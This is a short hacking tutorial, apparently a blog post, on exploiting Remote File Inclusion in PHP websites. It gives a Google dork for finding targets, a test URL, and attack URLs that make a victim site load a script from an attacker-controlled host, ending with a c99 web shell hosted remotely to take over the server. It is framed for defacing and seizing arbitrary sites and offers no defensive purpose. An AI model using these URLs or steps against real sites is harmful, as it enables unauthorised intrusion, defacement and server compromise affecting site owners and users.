RFI(Remote File Inclusion)

Remote File Inclusion

Remote File Inclusion ( RFI ) allows the attacker to upload his file on a website server using a script. Remote File Inclusion is a common vulnerability found in many websites. Using RFI you can literally deface the websites, get access to the server. Here i am going to describe this.

Searching the Vulnerability:

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to this:

www.anywebsite.com/index.php?page=something


If you want to find more website like this try is with google dork.

inurl:index.php?page=

After going to the target website test it for RFI vulnerability. Use this:

www.anywebsite.com/index.php?page=http://www.google.com


after pressing enter if the google's homepage is there on the website, then this website is vulnerable to RFI attack.

Now you can execute your own scripts on the webserver of this website.

www.anywebsite.com/index.php?page=http://www.freehackersite.com/script.php

look at the original URL there is no extension. It means it is adding extension mnually so use "" after your url.

Now to gain access you should use c99 shell. you can download c99 shell from the link below:

c99 download link

now upload this script to any webhost and get a url of that. Let's say your url is like this:

www.mywebsite.com/c99.txt?

**Question Mark is must

now use your url in place of google url.

www.anywebsite.com/index.php?page=http://www.mywebsite.com/c99.txt?

Now the you are inside the website and you can do anything with it